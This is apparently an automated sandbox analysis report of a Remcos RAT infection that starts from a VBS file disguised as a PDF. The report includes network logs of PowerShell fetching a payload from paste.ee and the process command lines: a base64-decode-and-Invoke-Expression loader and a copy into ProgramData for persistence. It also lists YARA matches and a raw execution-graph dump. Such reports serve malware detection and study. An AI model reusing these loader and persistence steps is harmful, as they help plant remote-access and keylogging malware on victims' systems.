Connection: Keep-Alive

Timestamp:2024-12-09 15:34:06 UTC
Bytes transferred:803
Direction:IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 2230233
Content-Type: image/jpeg
Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
Date: Mon, 09 Dec 2024 15:34:06 GMT
Strict-Transport-Security: max-age=604800
Cache-Control: public, no-transform, immutable, max-age=2592000
Server-Timing: cld-fastly;dur=145;cpu=1;start=2024-12-09T15:34:06.067Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=131;start=2024-12-09T15:34:06.077Z
Server: Cloudinary
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
x-request-id: 6f487a4c60d72621f2efeecff85ca20a


Session ID:1
Source IP:192.168.2.6
Source Port:49772
Destination IP:172.67.187.200
Destination Port:443
PID:2020
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp:2024-12-09 15:34:29 UTC
Bytes transferred:67
Direction:OUT
Data:
GET /r/TZC1n/0 HTTP/1.1
Host: paste.ee
Connection: Keep-Alive

Timestamp:2024-12-09 15:34:29 UTC
Bytes transferred:1280
Direction:IN
Data:
HTTP/1.1 200 OK
Date: Mon, 09 Dec 2024 15:34:29 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: HIT
Age: 32538
Last-Modified: Mon, 09 Dec 2024 06:32:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MykZe9uLkyv4566L5twBm95km77X6s2uBiYx1LITcMZgv5YQUeh4C3rArIVFvD2XnnK2Z8KM0paC2P8cEmJpO0BvzBcVGjXjfC8d6CiFxdGipg145kiV5bI9Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ef60f414939c454-EWR
alt-svc: h3=":443"; ma=86400

Timestamp:2024-12-09 15:34:29 UTC
Bytes transferred:215
Direction:IN
Data:
server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1511&rtt_var=582&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1857506&cwnd=162&unsent_bytes=0&cid=9b42aae8be412cdd&ts=459&x=0"



                                                                                                                      Target ID:0
                                                                                                                      Start time:10:33:59
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                                                                                                                      Imagebase:0x7ff7731c0000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:10:34:00
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:34:00
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:10
                                                                                                                      Start time:10:34:25
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
                                                                                                                      Imagebase:0x7ff6c3730000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:10:34:26
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:10:34:28
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:wscript.exe C:\ProgramData\classers.vbs
                                                                                                                      Imagebase:0x7ff7731c0000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:10:34:29
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      Imagebase:0x20000
                                                                                                                      File size:262'432 bytes
                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:10:34:30
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      Imagebase:0xb50000
                                                                                                                      File size:262'432 bytes
                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:18
                                                                                                                      Start time:10:34:36
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff7403e0000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:5.9%
                                                                                                                        Total number of Nodes:1381
                                                                                                                        Total number of Limit Nodes:62
46618->46621 46619 40da46 46908 401e18 46619->46908 47121 4064d0 97 API calls 46621->47121 46622 40da51 46912 401e13 46622->46912 46625 40da5a 46626 401d64 28 API calls 46625->46626 46627 40da63 46626->46627 46628 401d64 28 API calls 46627->46628 46629 40da7d 46628->46629 46630 401d64 28 API calls 46629->46630 46631 40da97 46630->46631 46632 401d64 28 API calls 46631->46632 46634 40dab0 46632->46634 46633 40db1d 46635 40db2c 46633->46635 46642 40dcaa ___scrt_fastfail 46633->46642 46634->46633 46636 401d64 28 API calls 46634->46636 46637 40db35 46635->46637 46665 40dbb1 ___scrt_fastfail 46635->46665 46640 40dac5 _wcslen 46636->46640 46638 401d64 28 API calls 46637->46638 46639 40db3e 46638->46639 46641 401d64 28 API calls 46639->46641 46640->46633 46643 401d64 28 API calls 46640->46643 46644 40db50 46641->46644 47182 41265d RegOpenKeyExA 46642->47182 46645 40dae0 46643->46645 46647 401d64 28 API calls 46644->46647 46648 401d64 28 API calls 46645->46648 46649 40db62 46647->46649 46650 40daf5 46648->46650 46653 401d64 28 API calls 46649->46653 47123 40c89e 46650->47123 46651 40dcef 46652 401d64 28 API calls 46651->46652 46654 40dd16 46652->46654 46656 40db8b 46653->46656 46926 401f66 46654->46926 46659 401d64 28 API calls 46656->46659 46658 401e18 26 API calls 46661 40db14 46658->46661 46662 40db9c 46659->46662 46664 401e13 26 API calls 46661->46664 47180 40bc67 45 API calls _wcslen 46662->47180 46663 40dd25 46930 4126d2 RegCreateKeyA 46663->46930 46664->46633 46916 4128a2 46665->46916 46669 40dc45 ctype 46674 401d64 28 API calls 46669->46674 46670 40dbac 46670->46665 46672 401d64 28 API calls 46673 40dd47 46672->46673 46936 43a5e7 46673->46936 46675 40dc5c 46674->46675 46675->46651 46679 40dc70 46675->46679 46678 40dd5e 47185 41beb0 86 API calls ___scrt_fastfail 46678->47185 46681 401d64 28 API calls 46679->46681 46680 40dd81 46685 401f66 28 API calls 46680->46685 46683 40dc7e 46681->46683 46686 41ae08 28 API calls 46683->46686 46684 40dd65 CreateThread 46684->46680 
47849 41c96f 10 API calls 46684->47849 46687 40dd96 46685->46687 46688 40dc87 46686->46688 46689 401f66 28 API calls 46687->46689 47181 40e219 109 API calls 46688->47181 46691 40dda5 46689->46691 46940 41a686 46691->46940 46692 40dc8c 46692->46651 46694 40dc93 46692->46694 46694->46590 46696 401d64 28 API calls 46697 40ddb6 46696->46697 46698 401d64 28 API calls 46697->46698 46699 40ddcb 46698->46699 46700 401d64 28 API calls 46699->46700 46701 40ddeb 46700->46701 46702 43a5e7 _strftime 42 API calls 46701->46702 46703 40ddf8 46702->46703 46704 401d64 28 API calls 46703->46704 46705 40de03 46704->46705 46706 401d64 28 API calls 46705->46706 46707 40de14 46706->46707 46708 401d64 28 API calls 46707->46708 46709 40de29 46708->46709 46710 401d64 28 API calls 46709->46710 46711 40de3a 46710->46711 46712 40de41 StrToIntA 46711->46712 46964 409517 46712->46964 46715 401d64 28 API calls 46716 40de5c 46715->46716 46717 40dea1 46716->46717 46718 40de68 46716->46718 46721 401d64 28 API calls 46717->46721 47186 43360d 22 API calls 3 library calls 46718->47186 46720 40de71 46722 401d64 28 API calls 46720->46722 46723 40deb1 46721->46723 46724 40de84 46722->46724 46725 40def9 46723->46725 46726 40debd 46723->46726 46727 40de8b CreateThread 46724->46727 46729 401d64 28 API calls 46725->46729 47187 43360d 22 API calls 3 library calls 46726->47187 46727->46717 47847 419128 102 API calls 2 library calls 46727->47847 46731 40df02 46729->46731 46730 40dec6 46732 401d64 28 API calls 46730->46732 46734 40df6c 46731->46734 46735 40df0e 46731->46735 46733 40ded8 46732->46733 46736 40dedf CreateThread 46733->46736 46737 401d64 28 API calls 46734->46737 46738 401d64 28 API calls 46735->46738 46736->46725 47846 419128 102 API calls 2 library calls 46736->47846 46739 40df75 46737->46739 46740 40df1e 46738->46740 46741 40df81 46739->46741 46742 40dfba 46739->46742 46743 401d64 28 API calls 46740->46743 46744 401d64 28 API calls 46741->46744 46989 41a7a2 GetComputerNameExW GetUserNameW 
46742->46989 46745 40df33 46743->46745 46747 40df8a 46744->46747 47188 40c854 31 API calls 46745->47188 46753 401d64 28 API calls 46747->46753 46749 401e18 26 API calls 46750 40dfce 46749->46750 46752 401e13 26 API calls 46750->46752 46755 40dfd7 46752->46755 46756 40df9f 46753->46756 46754 40df46 46757 401e18 26 API calls 46754->46757 46758 40dfe0 SetProcessDEPPolicy 46755->46758 46759 40dfe3 CreateThread 46755->46759 46766 43a5e7 _strftime 42 API calls 46756->46766 46760 40df52 46757->46760 46758->46759 46761 40e004 46759->46761 46762 40dff8 CreateThread 46759->46762 47819 40e54f 46759->47819 46763 401e13 26 API calls 46760->46763 46764 40e019 46761->46764 46765 40e00d CreateThread 46761->46765 46762->46761 47848 410f36 137 API calls 46762->47848 46767 40df5b CreateThread 46763->46767 46769 40e073 46764->46769 46771 401f66 28 API calls 46764->46771 46765->46764 47850 411524 38 API calls ___scrt_fastfail 46765->47850 46768 40dfac 46766->46768 46767->46734 47851 40196b 49 API calls _strftime 46767->47851 47189 40b95c 7 API calls 46768->47189 47000 41246e RegOpenKeyExA 46769->47000 46772 40e046 46771->46772 47190 404c9e 28 API calls 46772->47190 46775 40e053 46777 401f66 28 API calls 46775->46777 46779 40e062 46777->46779 46778 40e12a 47012 40cbac 46778->47012 46782 41a686 79 API calls 46779->46782 46781 41ae08 28 API calls 46784 40e0a4 46781->46784 46785 40e067 46782->46785 47003 412584 RegOpenKeyExW 46784->47003 46787 401eea 26 API calls 46785->46787 46787->46769 46790 401e13 26 API calls 46793 40e0c5 46790->46793 46791 40e0ed DeleteFileW 46792 40e0f4 46791->46792 46791->46793 46795 41ae08 28 API calls 46792->46795 46793->46791 46793->46792 46794 40e0db Sleep 46793->46794 47191 401e07 46794->47191 46797 40e104 46795->46797 47008 41297a RegOpenKeyExW 46797->47008 46799 40e117 46800 401e13 26 API calls 46799->46800 46801 40e121 46800->46801 46802 401e13 26 API calls 46801->46802 46802->46778 46803->46489 46804->46495 46805->46493 46806->46503 46807->46505 
46808->46508 46809->46483 46810->46486 46811->46490 46812->46512 46813->46514 46814->46516 46815->46519 46817 433c71 GetStartupInfoW 46816->46817 46817->46523 46819 44dddb 46818->46819 46820 44ddd2 46818->46820 46819->46526 46823 44dcc8 51 API calls 4 library calls 46820->46823 46822->46526 46823->46819 46825 41bd22 LoadLibraryA GetProcAddress 46824->46825 46826 41bd12 GetModuleHandleA GetProcAddress 46824->46826 46827 41bd4b 32 API calls 46825->46827 46828 41bd3b LoadLibraryA GetProcAddress 46825->46828 46826->46825 46827->46531 46828->46827 47195 41a63f FindResourceA 46829->47195 46832 43a88c ___crtLCMapStringA 21 API calls 46833 40e192 ctype 46832->46833 46834 401f86 28 API calls 46833->46834 46835 40e1ad 46834->46835 46836 401eef 26 API calls 46835->46836 46837 40e1b8 46836->46837 46838 401eea 26 API calls 46837->46838 46839 40e1c1 46838->46839 46840 43a88c ___crtLCMapStringA 21 API calls 46839->46840 46841 40e1d2 ctype 46840->46841 47198 406052 46841->47198 46843 40e205 46843->46533 46864 41afd6 46844->46864 46845 41b046 46846 401eea 26 API calls 46845->46846 46847 41b078 46846->46847 46848 401eea 26 API calls 46847->46848 46851 41b080 46848->46851 46849 41b048 46852 403b60 28 API calls 46849->46852 46853 401eea 26 API calls 46851->46853 46854 41b054 46852->46854 46857 40d7c6 46853->46857 46855 401eef 26 API calls 46854->46855 46858 41b05d 46855->46858 46856 401eef 26 API calls 46856->46864 46865 40e8bd 46857->46865 46859 401eea 26 API calls 46858->46859 46861 41b065 46859->46861 46860 401eea 26 API calls 46860->46864 47205 41bfa9 28 API calls 46861->47205 46864->46845 46864->46849 46864->46856 46864->46860 47201 403b60 46864->47201 47204 41bfa9 28 API calls 46864->47204 46866 40e8ca 46865->46866 46868 40e8da 46866->46868 47222 40200a 26 API calls 46866->47222 46868->46541 47223 404bc4 46869->47223 46871 405cf4 46871->46558 46873 401efe 46872->46873 46875 401f0a 46873->46875 47227 4021b9 26 API calls 46873->47227 46875->46562 46877 401ec9 46876->46877 46878 
401ee4 46877->46878 46879 402325 28 API calls 46877->46879 46878->46572 46879->46878 47228 401e8f 46880->47228 46882 40bee1 CreateMutexA GetLastError 46882->46588 47230 41b15b 46883->47230 46888 401eef 26 API calls 46889 41a49f 46888->46889 46890 401eea 26 API calls 46889->46890 46891 41a4a7 46890->46891 46892 41a4fa 46891->46892 46893 412513 31 API calls 46891->46893 46892->46593 46894 41a4cd 46893->46894 46895 41a4d8 StrToIntA 46894->46895 46896 41a4ef 46895->46896 46897 41a4e6 46895->46897 46899 401eea 26 API calls 46896->46899 47238 41c102 28 API calls 46897->47238 46899->46892 46901 40698f 46900->46901 46902 4124b7 3 API calls 46901->46902 46903 406996 46902->46903 46903->46604 46903->46605 46905 41ae1c 46904->46905 47239 40b027 46905->47239 46907 41ae24 46907->46619 46909 401e27 46908->46909 46910 401e33 46909->46910 47248 402121 26 API calls 46909->47248 46910->46622 46914 402121 46912->46914 46913 402150 46913->46625 46914->46913 47249 402718 26 API calls _Deallocate 46914->47249 46917 4128c0 46916->46917 46918 406052 28 API calls 46917->46918 46919 4128d5 46918->46919 46920 401fbd 28 API calls 46919->46920 46921 4128e5 46920->46921 46922 4126d2 29 API calls 46921->46922 46923 4128ef 46922->46923 46924 401eea 26 API calls 46923->46924 46925 4128fc 46924->46925 46925->46669 46927 401f6e 46926->46927 47250 402301 46927->47250 46931 412722 46930->46931 46933 4126eb 46930->46933 46932 401eea 26 API calls 46931->46932 46934 40dd3b 46932->46934 46935 4126fd RegSetValueExA RegCloseKey 46933->46935 46934->46672 46935->46931 46937 43a600 _strftime 46936->46937 47254 43993e 46937->47254 46941 41a737 46940->46941 46942 41a69c GetLocalTime 46940->46942 46944 401eea 26 API calls 46941->46944 46943 404cbf 28 API calls 46942->46943 46945 41a6de 46943->46945 46946 41a73f 46944->46946 46947 405ce6 28 API calls 46945->46947 46948 401eea 26 API calls 46946->46948 46949 41a6ea 46947->46949 46950 40ddaa 46948->46950 46951 4027cb 28 API calls 46949->46951 46950->46696 46952 
41a6f6 46951->46952 46953 405ce6 28 API calls 46952->46953 46954 41a702 46953->46954 47288 406478 76 API calls 46954->47288 46956 41a710 46957 401eea 26 API calls 46956->46957 46958 41a71c 46957->46958 46959 401eea 26 API calls 46958->46959 46960 41a725 46959->46960 46961 401eea 26 API calls 46960->46961 46962 41a72e 46961->46962 46963 401eea 26 API calls 46962->46963 46963->46941 46965 409536 _wcslen 46964->46965 46966 409541 46965->46966 46967 409558 46965->46967 46968 40c89e 31 API calls 46966->46968 46969 40c89e 31 API calls 46967->46969 46970 409549 46968->46970 46971 409560 46969->46971 46972 401e18 26 API calls 46970->46972 46973 401e18 26 API calls 46971->46973 46988 409553 46972->46988 46974 40956e 46973->46974 46975 401e13 26 API calls 46974->46975 46977 409576 46975->46977 46976 401e13 26 API calls 46978 4095ad 46976->46978 47304 40856b 28 API calls 46977->47304 47289 409837 46978->47289 46981 409588 47305 4028cf 46981->47305 46984 409593 46985 401e18 26 API calls 46984->46985 46986 40959d 46985->46986 46987 401e13 26 API calls 46986->46987 46987->46988 46988->46976 47473 403b40 46989->47473 46993 41a7fd 46994 4028cf 28 API calls 46993->46994 46995 41a807 46994->46995 46996 401e13 26 API calls 46995->46996 46997 41a810 46996->46997 46998 401e13 26 API calls 46997->46998 46999 40dfc3 46998->46999 46999->46749 47001 41248f RegQueryValueExA RegCloseKey 47000->47001 47002 40e08b 47000->47002 47001->47002 47002->46778 47002->46781 47004 4125b0 RegQueryValueExW RegCloseKey 47003->47004 47005 4125dd 47003->47005 47004->47005 47006 403b40 28 API calls 47005->47006 47007 40e0ba 47006->47007 47007->46790 47009 412992 RegDeleteValueW 47008->47009 47010 4129a6 47008->47010 47009->47010 47011 4129a2 47009->47011 47010->46799 47011->46799 47013 40cbc5 47012->47013 47014 41246e 3 API calls 47013->47014 47015 40cbcc 47014->47015 47019 40cbeb 47015->47019 47495 401602 47015->47495 47017 40cbd9 47498 4127d5 RegCreateKeyA 47017->47498 47020 413fd4 47019->47020 47021 413feb 
47020->47021 47515 41aa73 47021->47515 47023 413ff6 47024 401d64 28 API calls 47023->47024 47025 41400f 47024->47025 47026 43a5e7 _strftime 42 API calls 47025->47026 47027 41401c 47026->47027 47028 414021 Sleep 47027->47028 47029 41402e 47027->47029 47028->47029 47030 401f66 28 API calls 47029->47030 47031 41403d 47030->47031 47032 401d64 28 API calls 47031->47032 47033 41404b 47032->47033 47034 401fbd 28 API calls 47033->47034 47035 414053 47034->47035 47036 41afc3 28 API calls 47035->47036 47037 41405b 47036->47037 47519 404262 WSAStartup 47037->47519 47039 414065 47040 401d64 28 API calls 47039->47040 47041 41406e 47040->47041 47042 401d64 28 API calls 47041->47042 47103 4140ed 47041->47103 47043 414087 47042->47043 47044 401d64 28 API calls 47043->47044 47045 414098 47044->47045 47047 401d64 28 API calls 47045->47047 47046 41afc3 28 API calls 47046->47103 47048 4140a9 47047->47048 47050 401d64 28 API calls 47048->47050 47049 4085b4 28 API calls 47049->47103 47051 4140ba 47050->47051 47053 401d64 28 API calls 47051->47053 47052 401eef 26 API calls 47052->47103 47054 4140cb 47053->47054 47055 401d64 28 API calls 47054->47055 47056 4140dd 47055->47056 47649 404101 87 API calls 47056->47649 47058 404cbf 28 API calls 47058->47103 47059 401d64 28 API calls 47059->47103 47061 414244 WSAGetLastError 47650 41bc76 30 API calls 47061->47650 47066 401f66 28 API calls 47067 414259 47066->47067 47067->47066 47069 41a686 79 API calls 47067->47069 47071 401d64 28 API calls 47067->47071 47072 401d8c 26 API calls 47067->47072 47073 43a5e7 _strftime 42 API calls 47067->47073 47067->47103 47105 414b22 CreateThread 47067->47105 47106 401eea 26 API calls 47067->47106 47107 401e13 26 API calls 47067->47107 47651 404c9e 28 API calls 47067->47651 47652 40a767 84 API calls 47067->47652 47653 4047eb 98 API calls 47067->47653 47069->47067 47071->47067 47072->47067 47074 414b80 Sleep 47073->47074 47074->47067 47075 401f66 28 API calls 47075->47103 47076 41a686 79 API calls 47076->47103 
47079 4082dc 28 API calls 47079->47103 47080 440c51 26 API calls 47080->47103 47081 401fbd 28 API calls 47081->47103 47082 41265d 3 API calls 47082->47103 47083 412513 31 API calls 47083->47103 47084 403b40 28 API calls 47084->47103 47087 41aec8 28 API calls 47087->47103 47088 41ad46 28 API calls 47088->47103 47089 401d64 28 API calls 47090 4144ed GetTickCount 47089->47090 47091 41ad46 28 API calls 47090->47091 47091->47103 47096 40275c 28 API calls 47096->47103 47097 405ce6 28 API calls 47097->47103 47098 4027cb 28 API calls 47098->47103 47099 404468 60 API calls 47099->47103 47100 401eea 26 API calls 47100->47103 47101 401e13 26 API calls 47101->47103 47103->47046 47103->47049 47103->47052 47103->47058 47103->47059 47103->47061 47103->47067 47103->47075 47103->47076 47103->47079 47103->47080 47103->47081 47103->47082 47103->47083 47103->47084 47103->47087 47103->47088 47103->47089 47103->47096 47103->47097 47103->47098 47103->47099 47103->47100 47103->47101 47520 413f9a 47103->47520 47525 4041f1 47103->47525 47532 404915 47103->47532 47547 40428c connect 47103->47547 47607 41a96d 47103->47607 47610 413683 47103->47610 47613 40cbf1 47103->47613 47619 41adee 47103->47619 47622 41aca0 47103->47622 47624 41ac52 47103->47624 47629 40e679 GetLocaleInfoA 47103->47629 47632 4027ec 28 API calls 47103->47632 47633 4045d5 47103->47633 47105->47067 47812 419e89 102 API calls 47105->47812 47106->47067 47107->47067 47108->46549 47109->46559 47112 4085c0 47111->47112 47113 402e78 28 API calls 47112->47113 47114 4085e4 47113->47114 47114->46580 47116 4124e1 RegQueryValueExA RegCloseKey 47115->47116 47117 41250b 47115->47117 47116->47117 47117->46576 47118->46583 47119->46612 47120->46605 47121->46596 47122->46610 47124 40c8ba 47123->47124 47125 40c8da 47124->47125 47126 40c90f 47124->47126 47128 40c8d0 47124->47128 47813 41a74b 29 API calls 47125->47813 47129 41b15b GetCurrentProcess 47126->47129 47127 40ca03 GetLongPathNameW 47131 403b40 28 API calls 47127->47131 47128->47127 
47132 40c914 47129->47132 47134 40ca18 47131->47134 47135 40c918 47132->47135 47136 40c96a 47132->47136 47133 40c8e3 47137 401e18 26 API calls 47133->47137 47138 403b40 28 API calls 47134->47138 47140 403b40 28 API calls 47135->47140 47139 403b40 28 API calls 47136->47139 47141 40c8ed 47137->47141 47142 40ca27 47138->47142 47143 40c978 47139->47143 47144 40c926 47140->47144 47145 401e13 26 API calls 47141->47145 47816 40cc37 28 API calls 47142->47816 47149 403b40 28 API calls 47143->47149 47150 403b40 28 API calls 47144->47150 47145->47128 47147 40ca3a 47817 402860 28 API calls 47147->47817 47152 40c98e 47149->47152 47153 40c93c 47150->47153 47151 40ca45 47818 402860 28 API calls 47151->47818 47815 402860 28 API calls 47152->47815 47814 402860 28 API calls 47153->47814 47157 40ca4f 47161 401e13 26 API calls 47157->47161 47158 40c999 47162 401e18 26 API calls 47158->47162 47159 40c947 47160 401e18 26 API calls 47159->47160 47164 40c952 47160->47164 47165 40ca59 47161->47165 47163 40c9a4 47162->47163 47166 401e13 26 API calls 47163->47166 47167 401e13 26 API calls 47164->47167 47168 401e13 26 API calls 47165->47168 47170 40c9ad 47166->47170 47171 40c95b 47167->47171 47169 40ca62 47168->47169 47172 401e13 26 API calls 47169->47172 47173 401e13 26 API calls 47170->47173 47174 401e13 26 API calls 47171->47174 47175 40ca6b 47172->47175 47173->47141 47174->47141 47176 401e13 26 API calls 47175->47176 47177 40ca74 47176->47177 47178 401e13 26 API calls 47177->47178 47179 40ca7d 47178->47179 47179->46658 47180->46670 47181->46692 47183 412683 RegQueryValueExA RegCloseKey 47182->47183 47184 4126a7 47182->47184 47183->47184 47184->46651 47185->46684 47186->46720 47187->46730 47188->46754 47189->46742 47190->46775 47192 401e0c 47191->47192 47193->46603 47196 40e183 47195->47196 47197 41a65c LoadResource LockResource SizeofResource 47195->47197 47196->46832 47197->47196 47199 401f86 28 API calls 47198->47199 47200 406066 47199->47200 47200->46843 47206 403c30 47201->47206 
